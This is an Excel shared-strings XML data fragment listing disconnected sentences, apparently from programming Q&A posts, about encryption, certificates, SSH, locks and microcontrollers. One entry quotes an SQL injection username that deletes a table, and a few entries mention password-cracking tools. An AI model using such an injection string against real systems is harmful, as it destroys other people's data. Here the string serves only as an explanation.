  </si>
  <si>
    <t>Dynamically generated SQL can be vulnerable to SQL Injection.</t>
  </si>
  <si>
    <t>Different proxy types can be mixed in the same chain.</t>
  </si>
  <si>
    <t>After some small mistakes I finally got data from a keycard.</t>
  </si>
  <si>
    <t>Is this a side effect of corruption, or a external library affecting it?</t>
  </si>
  <si>
    <t>If you miss a key (like I did originally), it'll tell you There is no public key available for the following key IDs: 6FB2A1C265FFB764.</t>
  </si>
  <si>
    <t>I'm trying to control a small car toy using the raspberry pi 3 the SSH 
from my laptop.</t>
  </si>
  <si>
    <t>Could it be that in one case your process has sudo rights and it doesn't in the other case?</t>
  </si>
  <si>
    <t>In my case, the same error was produced by antivirus detection.</t>
  </si>
  <si>
    <t>RELIC is an Efficient LIbrary for Cryptography</t>
  </si>
  <si>
    <t>Trade secrets aren't themselves protected, but misappropriation of them is.</t>
  </si>
  <si>
    <t>CryptoSwift is a collection of standards and algorithms to fulfill most cryptographic needs.</t>
  </si>
  <si>
    <t>Typically, only a user with the same logon credential as the user who encrypted the data can decrypt the data.</t>
  </si>
  <si>
    <t>I've an odd behavior with p12 certificates and amazon iot.</t>
  </si>
  <si>
    <t>Is it possible to reliably OCR an RSA key fob and if so are there any examples of it?</t>
  </si>
  <si>
    <t>0x7 : 0, 0, 0, 0, 0, 0, F5, A5, A0, 38, 0, 0, 0, 0, 0, 0
Authenticate with key A then key B if failed
Authenticated block nb.</t>
  </si>
  <si>
    <t>RSA is a public key cryptography algorithm.</t>
  </si>
  <si>
    <t>the cipher TLS_DHE_RSA_WITH_AES_128_CBC_SHA did very well, going up to 1,3MB/s.</t>
  </si>
  <si>
    <t>I assume it is something to do with permissions?</t>
  </si>
  <si>
    <t>What is the username and password for non null authentication operation or where can i specify one?</t>
  </si>
  <si>
    <t>I have a Raspberry Pi running raspbian that I can no longer login to.</t>
  </si>
  <si>
    <t>Hi i'm using xtea encryption library on arduino.</t>
  </si>
  <si>
    <t>instead of 00000000
Here is the code I used to interpret it</t>
  </si>
  <si>
    <t>If I login to the shell from my Mac using SSH, and run the code , there will be an exception says "Unicode...." something like that.</t>
  </si>
  <si>
    <t>Does anyone have any insight into what is causing the lock up?</t>
  </si>
  <si>
    <t>I used self signed certificates.</t>
  </si>
  <si>
    <t>I don't know which file permissions are blocking me.</t>
  </si>
  <si>
    <t>However, before that, the device needs to sign on to the user's network first.</t>
  </si>
  <si>
    <t>I think I should use lock system or something like that.</t>
  </si>
  <si>
    <t>Seems like it only works on wifi that is locked down vie SSA.</t>
  </si>
  <si>
    <t>I have a router tag, and that works with a href hashes.</t>
  </si>
  <si>
    <t>3) Generate a certificate for my device signed by my CA.</t>
  </si>
  <si>
    <t>It is a bit like reversed security cams script because they react on movement and I want it to react to no movement at all.</t>
  </si>
  <si>
    <t>the SSL certificate uses a 2048 bit key.</t>
  </si>
  <si>
    <t>Here each device certificate will be signed with same CA certificate.</t>
  </si>
  <si>
    <t>The value will be used as a code to encrypt using AES-128.</t>
  </si>
  <si>
    <t>All my folders on the NAS are encrypted.</t>
  </si>
  <si>
    <t>And why does the thread safety of QString matter here?</t>
  </si>
  <si>
    <t>The encryption used is AES128-GCM, therefore I am using gcm.h.</t>
  </si>
  <si>
    <t>and size must be between 0 and 4096.</t>
  </si>
  <si>
    <t>which encryption method I should use?</t>
  </si>
  <si>
    <t>letsencrypt but self signed certificates, only.</t>
  </si>
  <si>
    <t>How can I do this (using a self-signed SSL certificate)?</t>
  </si>
  <si>
    <t>How should I go about Hashing the char*?</t>
  </si>
  <si>
    <t>The logical conclusion would be that my memcpy is corrupting i.</t>
  </si>
  <si>
    <t>Most likely your cipher keys are different.</t>
  </si>
  <si>
    <t>Just hash the password and store the hash.</t>
  </si>
  <si>
    <t>You can treat Java bytes as unsigned.</t>
  </si>
  <si>
    <t>The signed value can only be -32768 to +32767.</t>
  </si>
  <si>
    <t>A neverending  loop in OpeningFcn will indefinitely lock up your GUI.</t>
  </si>
  <si>
    <t>So the more you click, the more it could get blocked.</t>
  </si>
  <si>
    <t>Encryption - done.</t>
  </si>
  <si>
    <t>One way would be to block till data is available.</t>
  </si>
  <si>
    <t>I'm assuming you already have a WiFi/Ethernet shield on your Arduino.</t>
  </si>
  <si>
    <t>With wav file, it seems to like signed wav files.</t>
  </si>
  <si>
    <t>You're not using a self-signed certificate, are you?</t>
  </si>
  <si>
    <t>As to what it actually does, that depends on what CharacterMask and customKey are.</t>
  </si>
  <si>
    <t>I am assuming you can ssh into your raspberry pi, if so try:</t>
  </si>
  <si>
    <t>HAAR cascades are a bit intensive as well (especially on a system like Intel Galileo Gen2).</t>
  </si>
  <si>
    <t>The CRC32 of the new key is calculated only over the key data itself.</t>
  </si>
  <si>
    <t>I'm going to assume you're using SSH keys, if not please elaborate.</t>
  </si>
  <si>
    <t>You need to tell  that your data isn't padded.</t>
  </si>
  <si>
    <t>It does use bitshifting on a signed value.</t>
  </si>
  <si>
    <t>What you can do, is generate a self-signed certificate and use that to connect through SSL.</t>
  </si>
  <si>
    <t>I notice that your password buffer is 4 chars long.</t>
  </si>
  <si>
    <t>The payload and the LoraWan packet are both encrypted.</t>
  </si>
  <si>
    <t>Doing so might have application security implications.</t>
  </si>
  <si>
    <t>Do you really want to block the whole server with that cv.waitKey?</t>
  </si>
  <si>
    <t>Else (FPort = 0), it's encrypted by using the NwkSKey key.</t>
  </si>
  <si>
    <t>We are sure that barcode will always be number.</t>
  </si>
  <si>
    <t>I've definitely done that before where I had it with X509, but specified RSA by accident.</t>
  </si>
  <si>
    <t>This was using the device key, not certificates but I would assume this might work as well.</t>
  </si>
  <si>
    <t>I think your driver need to be signed by Microsoft.</t>
  </si>
  <si>
    <t>I am assuming by access you mean ssh or sftp access.</t>
  </si>
  <si>
    <t>The queue you are using will be blocked by any access.</t>
  </si>
  <si>
    <t>for waitKey you can use esc or number keys:</t>
  </si>
  <si>
    <t>You are not contiuing encryption.</t>
  </si>
  <si>
    <t>About java.lang.IllegalStateException, a general-purpose exception defined in the Java API.</t>
  </si>
  <si>
    <t>It is defined within the Java Cryptography Architecture specification.</t>
  </si>
  <si>
    <t>Random access is also available.</t>
  </si>
  <si>
    <t>also known as a hash value.</t>
  </si>
  <si>
    <t>A privileged applet signed by the digital certificate.</t>
  </si>
  <si>
    <t>Signalling System No.</t>
  </si>
  <si>
    <t>You probably want [google-nativeclient] or [nacl-cryptography].</t>
  </si>
  <si>
    <t>Rack middleware for blocking &amp; throttling</t>
  </si>
  <si>
    <t>It supports SSH and webform cracking.</t>
  </si>
  <si>
    <t>Short for password.</t>
  </si>
  <si>
    <t>If no wake locks are taken, Android will shut down the CPU.</t>
  </si>
  <si>
    <t>For the crypto library, use [nacl-cryptography] or [libsodium].</t>
  </si>
  <si>
    <t>Windows Encrypted File System</t>
  </si>
  <si>
    <t>Java fake data generator.</t>
  </si>
  <si>
    <t>A block cipher is a keyed bijective function (also pseudo-random permutation).</t>
  </si>
  <si>
    <t>Zend Thread Safety is a Thread-safe PHP interpreter for use with the Apache HTTP Server.</t>
  </si>
  <si>
    <t>Encrypts data by using a symmetric key.</t>
  </si>
  <si>
    <t>A pure-Ruby implementation of the SSH2 client protocol.</t>
  </si>
  <si>
    <t>Also see pessimistic locking.</t>
  </si>
  <si>
    <t>Somebody please synonym it (I lack the rep in web-crawler tag)</t>
  </si>
  <si>
    <t>cryptographic hashes), i.e.</t>
  </si>
  <si>
    <t>Xpdf can decode LZW and read encrypted PDFs.</t>
  </si>
  <si>
    <t>Thus the "encrypt" and "decrypt" algorithms are identical.</t>
  </si>
  <si>
    <t>the same encryption mode (CBC, CTR or GCM commonly).</t>
  </si>
  <si>
    <t>Acknowledgements
The encryption in TICoreDataSync is provided by code written by Graham Lee.</t>
  </si>
  <si>
    <t>With the above capabilities, GitZilla allows for::
Per-user, or system-wide authentication for Bugzilla.</t>
  </si>
  <si>
    <t>Authenticators.</t>
  </si>
  <si>
    <t>No lock-in.</t>
  </si>
  <si>
    <t xml:space="preserve">
symmetric-key algorithms are algorithms for cryptography that
  use the same cryptographic keys for both encryption of plaintext and
  decryption of ciphertext.</t>
  </si>
  <si>
    <t>Other offloads are CPU offloads such as Intel's AES-NI for IPSec.</t>
  </si>
  <si>
    <t>Some examples:
https, ssl, c++, cryptography</t>
  </si>
  <si>
    <t>'cleartext'
Is the data that is to be encrypted with the key.</t>
  </si>
  <si>
    <t>Must be 1 when using an authenticator.</t>
  </si>
  <si>
    <t>authenticator
Is the data from which to derive an authenticator.</t>
  </si>
  <si>
    <t>Behaviors are used in yii2 for authentication.</t>
  </si>
  <si>
    <t>Code points above 0x10FFFF are not in Unicode range and are not to be used.</t>
  </si>
  <si>
    <t>Random access is not possible.</t>
  </si>
  <si>
    <t>implicitly specifies a key.</t>
  </si>
  <si>
    <t>NONE Cipher switching.</t>
  </si>
  <si>
    <t>Example of an Enveloped Signature.</t>
  </si>
  <si>
    <t>GNU Privacy Guard (GnuPG) is a cryptography application.</t>
  </si>
  <si>
    <t>In some of my other codes I noticed that having only safe functions result in checking conditions multiple time as the libraries get larger, so I started to develop both.</t>
  </si>
  <si>
    <t>As a library, TrueZIP provides simple, uniform, transparent,
thread-safe, read/write access to archive files as if they were
virtual directories in a file system path.</t>
  </si>
  <si>
    <t>I note the comments in the above link about applications being signed, but I have tried two mini test applications (also .net winforms), one signed, one not, and both run fine as custom shells.</t>
  </si>
  <si>
    <t>The one saved in the xml file is actually a kind of hash and if you don't set the correct value you'll have an error like 
Add Profile Failure: Invalid Profile XML.</t>
  </si>
  <si>
    <t>The LED side and the Flask side would communicate through a shared data structure, which you should arrange to lock if you're doing anything more complicated than doing an atomic assign to it.</t>
  </si>
  <si>
    <t>Thread safe by default
Portable; tested on 32 and 64 bit Windows, clang++ and g++
BSD licensed
More info:
ChaiScript
...on GitHub
A tiny example:</t>
  </si>
  <si>
    <t>This is partly because eventual consistency is purely a liveness guarantee (reads eventually return the same value) and does not make safety guarantees: an eventually consistent system can return any value before it converges.</t>
  </si>
  <si>
    <t>Starting with kernel 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled.</t>
  </si>
  <si>
    <t>Because the messages are encrypted while in the custody of WebSphere MQ, all ephemeral copies that WMQ makes, including transaction logs, memory, traces, etc., are also encrypted.</t>
  </si>
  <si>
    <t>The untrusted machine code is CPU architecture dependent, and CPU architecture neutrality is being addressed by the Portable Native Client (PNaCl) project.</t>
  </si>
  <si>
    <t>It allows the user to use an existing account to sign in to multiple websites, without needing to create new passwords.</t>
  </si>
  <si>
    <t>The problem is that the machine being in a public place and being using raspberry pi the code will not be encrypted and can be accessed by extracting the sd card.</t>
  </si>
  <si>
    <t>I want to securely send data to my InfluxDB over the Internet using a NodeMCU MCU and a self signed cert.</t>
  </si>
  <si>
    <t>CSPs are the modules that do the actual work of encoding and decoding data by performing the cryptographic functions.</t>
  </si>
  <si>
    <t>First it was my fault (I for got to lock it), now the crook upgraded by cutting chains.</t>
  </si>
  <si>
    <t>This is pain in case of many devices and certificate renewals or
Use an application level security which compromises the metadata such as topic, qos etc.</t>
  </si>
  <si>
    <t>The latter can be used for network processing at several levels, as well as for security applications, or even tracing and monitoring use cases.</t>
  </si>
  <si>
    <t>Identity management (or IdM) represents the joint result of business process and IT to manage user data on systems and applications.</t>
  </si>
  <si>
    <t>Why does PMCCNTR read as 0 in kernel mode, and an illegal instruction in user-mode?</t>
  </si>
  <si>
    <t>jarsigner uses an entity's private key to generate a signature.</t>
  </si>
  <si>
    <t>I'm kind of new with NFC and Raspberry Pi and I'm trying to create an authentication system for a PC using Pi with an ACR122U USB NFC Tag Reader.</t>
  </si>
  <si>
    <t>The signature for  class in Microsoft.Azure.Devices.Client is 
public sealed class DeviceClient : IDisposable.</t>
  </si>
  <si>
    <t>The attacker may say his username is
 x' into main_table; delete from main_table; insert 'bye
wiping the whole table.</t>
  </si>
  <si>
    <t>In either case, the user must accept the applet's security certificate, otherwise the applet is blocked from running.</t>
  </si>
  <si>
    <t>Applications built with NSS can support SSL v2 and v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, X.509 v3 certificates, and other security standards.</t>
  </si>
  <si>
    <t>For faster public key operations in Unix, you should install GMP in
  your system.</t>
  </si>
  <si>
    <t>over a variety of encryption standards.</t>
  </si>
  <si>
    <t>Rijndael is a block cipher that won the Advanced Encryption Standard competition.</t>
  </si>
  <si>
    <t>However, the user typically is not required to use an X.509 certificate to sign on.</t>
  </si>
  <si>
    <t>It lives securely on the server disk.</t>
  </si>
  <si>
    <t>1) ["ditto:outbound-auth-subject", "..."] under the Authorization context.</t>
  </si>
  <si>
    <t>This thread at Intel Communities kind of covers it.</t>
  </si>
  <si>
    <t>For more background material read about Shared Access Signature authentication here.</t>
  </si>
  <si>
    <t>I'm also a part of Charcoal, a network wide spam flagging project.</t>
  </si>
  <si>
    <t>encrypting the same data twice doesn't give the same result!!</t>
  </si>
  <si>
    <t>Try with some other devices from your friends/family/collegues -- just to connect an OTG cable and maybe an USB drive with a built-in LED for easier identification without the PC/Controller device -- if you have enough "test subjects) and they trust you to connect a storage device.</t>
  </si>
  <si>
    <t>When I try to cat /proc/interrupts, they system locks.</t>
  </si>
  <si>
    <t>But I sure that I have it defined with my BasicAuthenticator class above?</t>
  </si>
  <si>
    <t>There is currently no primary key on it, although it has a candidate key.</t>
  </si>
  <si>
    <t>Values in-between indicate
  different levels of transparency.</t>
  </si>
  <si>
    <t>I think that would be 100% safe but slow.</t>
  </si>
  <si>
    <t>I am not in a position to root the cellphones, so what else could one do in this instance?</t>
  </si>
  <si>
    <t>I'd also love a different approach, but it has to lock the PI!</t>
  </si>
  <si>
    <t>But want to send in 8-bits like 00000000 and 00000001.</t>
  </si>
  <si>
    <t>How do I store passphrase and use it to mount encrypted fs?</t>
  </si>
  <si>
    <t>Especially there is a hint at lockless programming.</t>
  </si>
  <si>
    <t>The encrypted data being sent to Arduino is too big.</t>
  </si>
  <si>
    <t>I have an ASP.Net page for login/register operations.</t>
  </si>
  <si>
    <t>I'm running a webserver using SSL protocole from a Raspberry Pi and a signed certificate from Gandi.</t>
  </si>
  <si>
    <t>Because I have to send DATA encrypted from a Raspberry Pi 3 (Windows IoT) to an server.</t>
  </si>
  <si>
    <t>So we wanted to to know how to decrypt the data back using the same algorithm but in PHP?</t>
  </si>
  <si>
    <t>What is the easiest way for me to decrypt the encrypted data?</t>
  </si>
  <si>
    <t>since keypad.getKey only allows to store one digit.</t>
  </si>
  <si>
    <t>I am sure that the communication is encrypt.</t>
  </si>
  <si>
    <t>To summarize:
I need to execute send_email.py before locking the file flock_email.sh.</t>
  </si>
  <si>
    <t>Can I spoof one with an Arduino (Arduino wiggler Clone o.o)?</t>
  </si>
  <si>
    <t>https://user:pass@host/) are blocked.</t>
  </si>
  <si>
    <t>So somewhere the CN used needs modification or there needs to be a way where I can specify the same registration id as my CNAME.</t>
  </si>
  <si>
    <t>I got a link to a hash password generator site.</t>
  </si>
  <si>
    <t>This is the error I get:
Thread 1: EXC_BAD_ACCESS (code=EXC_I386_GPFLT)
How can I get past this?</t>
  </si>
  <si>
    <t>I would like to encrypt the data while it is at rest on the device.</t>
  </si>
  <si>
    <t>0x5
Failed authentication block nb.</t>
  </si>
  <si>
    <t>0x6 - Try keyB - Failed authentication block nb.</t>
  </si>
  <si>
    <t>0x6
Failed authentication block nb.</t>
  </si>
  <si>
    <t>0x7 - Try keyB - Failed authentication block nb.</t>
  </si>
  <si>
    <t>We are not using any certificates, just using a profile access key and secret key.</t>
  </si>
  <si>
    <t>But I want to send only "blynk_token" and not the rest json data to server, So how can I achieve this?</t>
  </si>
  <si>
    <t>---&gt; Mono.Security.Protocol.Tls.TlsException: The authentication or decryption has failed.</t>
  </si>
  <si>
    <t>Also doing OAuth is kind of overkill as it is only for personal use.</t>
  </si>
  <si>
    <t>I want to be able to scan a barcode and if its barcode XXXXXX then I want it to send a certain number to the Arduino Uno.</t>
  </si>
  <si>
    <t>Here is my code:
I created my self signed certificate via:
In AngularJS I do simple:
A node server is running on the Raspberry.</t>
  </si>
  <si>
    <t>This will be used to self-sign and validate other certificates for authentication.</t>
  </si>
  <si>
    <t>I am defiantly not behind any kind of proxy.</t>
  </si>
  <si>
    <t>encoded in base64.</t>
  </si>
  <si>
    <t>But when i try to writhe in the .db it s saying that the database is locked.</t>
  </si>
  <si>
    <t>Antonio, there is some undocumented behavior going on...</t>
  </si>
  <si>
    <t>From man iwconfig
key/enc[ryption]
      Used to manipulate encryption or scrambling keys and security mode.</t>
  </si>
  <si>
    <t>The more commonly used XBee modules (Series 1 and 2) use 802.15.4 networking (instead of Wi-Fi's 802.11).</t>
  </si>
  <si>
    <t>Happy Hacking..</t>
  </si>
  <si>
    <t>What you're looking for is the concept of hashing/checksumming.</t>
  </si>
  <si>
    <t>This can be done stealthily (see Silent Knock) or obviously.</t>
  </si>
  <si>
    <t>This is likely being masked by your try/except block.</t>
  </si>
  <si>
    <t>Classically UNIX and Linux programs use locking files (such as ) to co-ordinate access to these devices.</t>
  </si>
  <si>
    <t>Short answer: No
Long answer: Arduino board doesn't support debug.</t>
  </si>
  <si>
    <t>Try var_dump($encrypted) instead of echoing.</t>
  </si>
  <si>
    <t>There is no way to pass password as param for ssh, but you can configure login by secure key (search keyword: ssh key authentication) for your device and use it from iphone, this way also bit more secure.</t>
  </si>
  <si>
    <t>Happy hacking :-)</t>
  </si>
  <si>
    <t>You can use  init at the constructor, lock for wait, unlock for signal, destroy at the destructor.</t>
  </si>
  <si>
    <t>So, the security is based on the PIN being kept a secret.</t>
  </si>
  <si>
    <t>There's a limit to the security in your setup, of course.</t>
  </si>
  <si>
    <t>Your screenState_keyHandler fits this signature.</t>
  </si>
  <si>
    <t>It isn't "secret knowledge", it is general rule in programming.</t>
  </si>
  <si>
    <t>Consequently you can't block the program.</t>
  </si>
  <si>
    <t>Further I assume that you use some standard scanner hardware which identifies to a Linux system as an HID keyboard device.</t>
  </si>
  <si>
    <t>Is your 0 in m:connect interpreted as secure or as autoreconnect?</t>
  </si>
  <si>
    <t>Here is an approach which doesn't seem to leak any threads.</t>
  </si>
  <si>
    <t xml:space="preserve">
So we wanted to to know how to decrypt the data back using the same algorithm but in PHP?</t>
  </si>
  <si>
    <t>Happy hacking!</t>
  </si>
  <si>
    <t>I registered and used a Flickr API and Secret Key to map the photos directory to my Flickr Account.</t>
  </si>
  <si>
    <t>It's Illegal: 
sscanf family is not typesafe.</t>
  </si>
  <si>
    <t>bt-pan  server pan0 &amp;
Start the bluetooth security agent with wonderful ease and confidence.</t>
  </si>
  <si>
    <t>These are for single precision calculations using NEON for RPi and SSE for Intel.</t>
  </si>
  <si>
    <t>The method you need is  after WiFi.scanNetworks() to determine whether a network encrypted or not.</t>
  </si>
  <si>
    <t>What you are looking for is  or strtok_r() - the latter is thread safe/reentrant.</t>
  </si>
  <si>
    <t>You, before shipping the device, encrypt something secret.</t>
  </si>
  <si>
    <t>When you connect the digital input pin to VCC, it will register 1.</t>
  </si>
  <si>
    <t>The algorithm for the key calculation of SecurityAccess service depends on the particular ECU specification.</t>
  </si>
  <si>
    <t>(Of course Docker Containers have their own limitations on security which can be overcome).</t>
  </si>
  <si>
    <t>So the Bluetooth device which tries to connect can use the same constant PIN for pairing.</t>
  </si>
  <si>
    <t>No guarantees, warranties, or other legal
liabilities.</t>
  </si>
  <si>
    <t>I get the impression you're mostly looking for confirmation and am happy to help with that if I can.</t>
  </si>
  <si>
    <t>HTTP interceptors are classical examples.</t>
  </si>
  <si>
    <t>So you want to keep AppKey secret.</t>
  </si>
  <si>
    <t>It seems related to UWP file access permission limitation.</t>
  </si>
  <si>
    <t>I am assuming that the user you're logged in as doesn't have permissions to run go.</t>
  </si>
  <si>
    <t>Since Windows 10(version 1607),  kernel mode drivers must be signed by Microsoft.</t>
  </si>
  <si>
    <t>The interrupt can interrupt anything that doesn't have interrupts locked out.</t>
  </si>
  <si>
    <t>The certificates used today are signed by DigiCert Baltimore and you can find them here.</t>
  </si>
  <si>
    <t>The CWSAP command fails because the password is too short.</t>
  </si>
  <si>
    <t>If you are logged into your Arduino you should use 'localhost' since I assume you are running MariaDB on the Arduino.</t>
  </si>
  <si>
    <t>SHA-1(Secure Hash Algorithm 1) is an encryption algorithm.</t>
  </si>
  <si>
    <t>It includes filenames, locations, size, and permissions.</t>
  </si>
  <si>
    <t>SyncLock is the VB.NET keyword for its locking statement.</t>
  </si>
  <si>
    <t>A cryptographic hash algorithm which uses a sponge construction.</t>
  </si>
  <si>
    <t>Locality-sensitive hashing (LSH) is a method of probabilistic dimension reduction.</t>
  </si>
  <si>
    <t>toastr is a JavaScript library for non-blocking notifications.</t>
  </si>
  <si>
    <t>ReadWriteLock is a structure of the two locks.</t>
  </si>
  <si>
    <t>Produces a CancellationToken and allows to single for its cancellation</t>
  </si>
  <si>
    <t>A misspelling of the encryption tag.</t>
  </si>
  <si>
    <t>User Groups are used by MODX to define permissions.</t>
  </si>
  <si>
    <t>jCryption is a jQuery plugin library utilizing RSA and AES.</t>
  </si>
  <si>
    <t>It's a Resource allocation and deadlock avoidance algorithm.</t>
  </si>
  <si>
    <t>Google Sign-In allows users to sign in to your application with their Google accounts</t>
  </si>
  <si>
    <t>Google-login refers to a sign-in API provided by Google.</t>
  </si>
  <si>
    <t>WhoisParser is a PHP library for querying WHOIS servers about names, IP addresses, and AS numbers.</t>
  </si>
  <si>
    <t>Keybase is a service for linking identities to encryption keys.</t>
  </si>
  <si>
    <t>Scribe is a simple OAuth library for Java</t>
  </si>
  <si>
    <t>Locality-sensitive hashing</t>
  </si>
  <si>
    <t>TrueCrypt is a software application used for on-the-fly encryption (OTFE).</t>
  </si>
  <si>
    <t>Outlook Redemption is a library which works around the security limitations introduced in Outlook 2002.</t>
  </si>
  <si>
    <t>This strategy is known as pessimistic locking.</t>
  </si>
  <si>
    <t>ProGuard is a tool to shrink, optimize, obfuscate, and preverify Java classes.</t>
  </si>
  <si>
    <t>Cisco ASA (Adaptive Security Appliance) is a family of security products from Cisco Systems.</t>
  </si>
  <si>
    <t>May be different for one key depending on browser.</t>
  </si>
  <si>
    <t>Aircrack-ng is a tool that can be used to crack keys used in WEP protocols in wireless networks.</t>
  </si>
  <si>
    <t>HDIV (HTTP Data Integrity Validator) is an opensource Web Application Security Framework for a java web applications.</t>
  </si>
  <si>
    <t>Ability to use any authentication scheme.</t>
  </si>
  <si>
    <t>Once a user has logged in, they can then log out or log off when access is no longer needed.</t>
  </si>
  <si>
    <t>Pure-FTPd provides MySql, PostgreSQL, LDAP, and custom authentication.</t>
  </si>
  <si>
    <t>Keccak is a cryptographic hash algorithm which uses a sponge construction.</t>
  </si>
  <si>
    <t>Three built-in CookiePolicy is defined: ACCEPT_ALL, ACCEPT_NONE and ACCEPT_ORIGINAL_SERVER.</t>
  </si>
  <si>
    <t>Keyczar supports authentication and encryption with both symmetric and asymmetric keys.</t>
  </si>
  <si>
    <t>For each F# code file, you can have a signature file, which is a file that has the same name as the code file but with the extension .fsi instead of .fs.</t>
  </si>
  <si>
    <t>It is not for other signature capture devices.</t>
  </si>
  <si>
    <t>Both share the same cryptographic underpinnings.</t>
  </si>
  <si>
    <t>This field does not limit the netgroup or provide security.</t>
  </si>
  <si>
    <t>The protocol was originally developed by BEA Systems, Canon, Intel, Microsoft, and WebMethods.</t>
  </si>
  <si>
    <t>TLS also allows the mutual authentication of the host and the server using X.509 certificates.</t>
  </si>
  <si>
    <t>Zend Optimizer/Zend Guard Loader is the server-side client for Zend's proprietary encryption of PHP code.</t>
  </si>
  <si>
    <t>Is collected data encrypted?</t>
  </si>
  <si>
    <t>Single-Sign-on authentication is provided via the MIT Kerberos KDC.</t>
  </si>
  <si>
    <t>It is also often used as an authentication measure in APIs.</t>
  </si>
  <si>
    <t>The raw RSA operation is not secure.</t>
  </si>
  <si>
    <t>More specifically a file integrity checker.</t>
  </si>
  <si>
    <t>What is meant by "thread-safe" code?</t>
  </si>
  <si>
    <t>TrueCrypt is a discontinued software application used for on-the-fly encryption (OTFE).</t>
  </si>
  <si>
    <t>See also: What Is AWS Secrets Manager?</t>
  </si>
  <si>
    <t>- AWS Secrets Manager</t>
  </si>
  <si>
    <t>Contrast with encryption, which must be reversible.</t>
  </si>
  <si>
    <t>They are commonly known as Microsoft Access databases.</t>
  </si>
  <si>
    <t>Another way to increase obfuscation is to use packers.</t>
  </si>
  <si>
    <t>bcrypt, scrypt) should not be referred to as "encryption".</t>
  </si>
  <si>
    <t>Each row corresponds to a username and hashed password pair, separated with the colon.</t>
  </si>
  <si>
    <t>Test that your code is multi-thread safe.</t>
  </si>
  <si>
    <t>Class: System.Security.Cryptography.RijndaelManaged</t>
  </si>
  <si>
    <t>XML Signatures can be Enveloped, Enveloping or Detached.</t>
  </si>
  <si>
    <t>Safe concurrency.</t>
  </si>
  <si>
    <t>Feature comparison Of Microsoft Access Versions.</t>
  </si>
  <si>
    <t>The TSG is chaired by Intel and Samsung, as the two primary platform contributors.</t>
  </si>
  <si>
    <t>Firstly, there are no unsigned values in Java.</t>
  </si>
  <si>
    <t>Now to unlock the door i am using the servo motor.</t>
  </si>
  <si>
    <t>I think it's a gimbal lock problem.</t>
  </si>
  <si>
    <t>On each PC I have an LUKS-encrypted partition.</t>
  </si>
  <si>
    <t>Or I can use another encryption systems, but all of them have to take a key form somewhere.</t>
  </si>
  <si>
    <t>Invalid device signature.</t>
  </si>
  <si>
    <t>I have problems with the signature ...</t>
  </si>
  <si>
    <t>I've tried FileAssassin and it can't remove the lock.</t>
  </si>
  <si>
    <t>I am trying to create self signed X.509 certificate to use in AWS IoT.</t>
  </si>
  <si>
    <t>Identical code except for the CreateAuthenticationHeader functions below.</t>
  </si>
  <si>
    <t>After some struggle, I was able to encrypt using node.js and decrypt it on NodeMCU.</t>
  </si>
  <si>
    <t>I know hcitool, but you have to be connected and they not give you data until you are at a distance.</t>
  </si>
  <si>
    <t>I'm using gitlab on my Raspberry Pi 2 B using Let's encrypt certificates.</t>
  </si>
  <si>
    <t>Invalid device signature" error.</t>
  </si>
  <si>
    <t>Is the 328p from the arduino locked in some sort of way?</t>
  </si>
  <si>
    <t>I found cryptography AVR-Crypto-Lib library for AVR microcontrollers.</t>
  </si>
  <si>
    <t>I keep getting the same error ImportError: No module named cryptography.hazmat.primitives.keywrap.</t>
  </si>
  <si>
    <t>I want to encrypt a text using Arduino and decrypt it using Java.</t>
  </si>
  <si>
    <t>It cannot have network access and ideally should be encrypted by Veracrypt.</t>
  </si>
  <si>
    <t>Unless the image is signed?</t>
  </si>
  <si>
    <t>I'm sure I'm doing the decoding and the decryption wrongly, but I don't know what exactly.</t>
  </si>
  <si>
    <t>I have a micro-controller (Arduino) and wish to determine automatically to which port the micro-controller locks to.</t>
  </si>
  <si>
    <t>How to protect this thread?</t>
  </si>
  <si>
    <t>This is supposed to control a lock.</t>
  </si>
  <si>
    <t>but I can't do that unless I can get some kind of unique identifier for each camera.</t>
  </si>
  <si>
    <t>What operation is not authorized?</t>
  </si>
  <si>
    <t>What should I take measure against stolen?</t>
  </si>
  <si>
    <t>The operation is not authorized.</t>
  </si>
  <si>
    <t>Tried the seeedrfid it successfully get the rfcard number.</t>
  </si>
  <si>
    <t>It appears we need super user access, is there another way to achieve this?</t>
  </si>
  <si>
    <t>I am working Android base Attendance door lock application.</t>
  </si>
  <si>
    <t>These number can be entered via a keypad.</t>
  </si>
  <si>
    <t>my android code is
my esp8266 code is
and this is how my app locks like
anyone have any idea?</t>
  </si>
  <si>
    <t>I assume it has something to do with the SSH configuration but I don't know enough about SSH to say what would be the cause.</t>
  </si>
  <si>
    <t>Malwarebytes shows that the files contain some kind of bitcoin mining trojan.</t>
  </si>
  <si>
    <t>Though I know 'secret' is deprecated, it is the only way for them to be authenticated.</t>
  </si>
  <si>
    <t>I am making a project for my school about digital locks and using an accelerometer.</t>
  </si>
  <si>
    <t>I also tried with various valid certificates, encrypted or not, it never works.</t>
  </si>
  <si>
    <t>Unfortunately, the MQTT protocol seems to be blocked by my network (I have no access to the router).</t>
  </si>
  <si>
    <t>(Assuming code is not protected.)</t>
  </si>
  <si>
    <t>Through the server I decoded IR signals.</t>
  </si>
  <si>
    <t>When printed to the console, the .c_str(), ROOTCERT and ca_cert Strings all appear IDENTICAL.</t>
  </si>
  <si>
    <t>That error is "The key data for the device credential in position 1 is invalid.</t>
  </si>
  <si>
    <t>Please help me decypher that signature 
void (*scanCompleteCB)(BLEScanResults)</t>
  </si>
  <si>
    <t>Suppose I am in a room which is totally locked and I am begging for the key, so I can go outside.</t>
  </si>
  <si>
    <t>Or do the Arduino have to extract the x509 and use that to later sign the request?</t>
  </si>
  <si>
    <t>Then I tried pipenv install --system 
I got 
Some how the hash changed.</t>
  </si>
  <si>
    <t>But there is problem in python:
I have hidden my account SID, token and number in the code below.</t>
  </si>
  <si>
    <t>(with only one global lock).</t>
  </si>
  <si>
    <t>No matter what, any self-contained system that needs to use plaintext passwords is compromisable.</t>
  </si>
  <si>
    <t>Linux's /dev/urandom is commonly implemented this way.</t>
  </si>
  <si>
    <t>I've used GNU parallel, with --sshlogin option, for this.</t>
  </si>
  <si>
    <t>But I would also argue that you'd still have problems even if the XBee didn't lock up.</t>
  </si>
  <si>
    <t>When your tried the cipher  you probably actually wanted to try TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (they surely look similar).</t>
  </si>
  <si>
    <t>Therefore what you want to do is speed up ssh.</t>
  </si>
  <si>
    <t>Some known signatures are displayed as a known file name.</t>
  </si>
  <si>
    <t>Some devices are silent until data is requested.</t>
  </si>
  <si>
    <t>On read, you would check the signature.</t>
  </si>
  <si>
    <t>The  function signature is: 
